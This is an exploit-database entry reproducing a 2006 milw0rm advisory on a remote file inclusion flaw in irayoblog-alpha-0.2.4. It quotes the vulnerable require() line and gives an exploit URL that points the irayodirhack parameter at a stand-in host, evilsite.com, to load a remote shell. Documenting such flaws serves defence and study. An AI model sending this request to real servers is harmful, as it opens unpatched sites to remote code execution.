header-logo
Suggest Exploit
vendor:
irayoblog-alpha-0.2.4
by:
Dr.Pantagon
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: irayoblog-alpha-0.2.4
Affected Version From: irayoblog-alpha-0.2.4
Affected Version To: irayoblog-alpha-0.2.4
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

irayoblog-alpha-0.2.4

A remote file inclusion vulnerability exists in irayoblog-alpha-0.2.4. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the irayodirhack parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion operation.
Source

Exploit-DB raw data:

*********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name :irayoblog-alpha-0.2.4

* Class = Remote File Inclusion ;
 
* Download =http://ovh.dl.sourceforge.net/sourceforge/irayoblog/irayoblog-alpha-0.2.4.tar.gz

* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

----------------------------------------------------------------------------------------------------------
- Vulnerable Code

    require($irayodirhack."/inc/configdefaults.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/inc/irayofuncs.php?irayodirhack=http://evilsite.com/shell?



----------------------------------------------------------------------------------------------------------

Special Thanks :  Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha

**********************************************************************************************************

# milw0rm.com [2006-11-08]

Navigation

Suggest Exploit

Services By CQR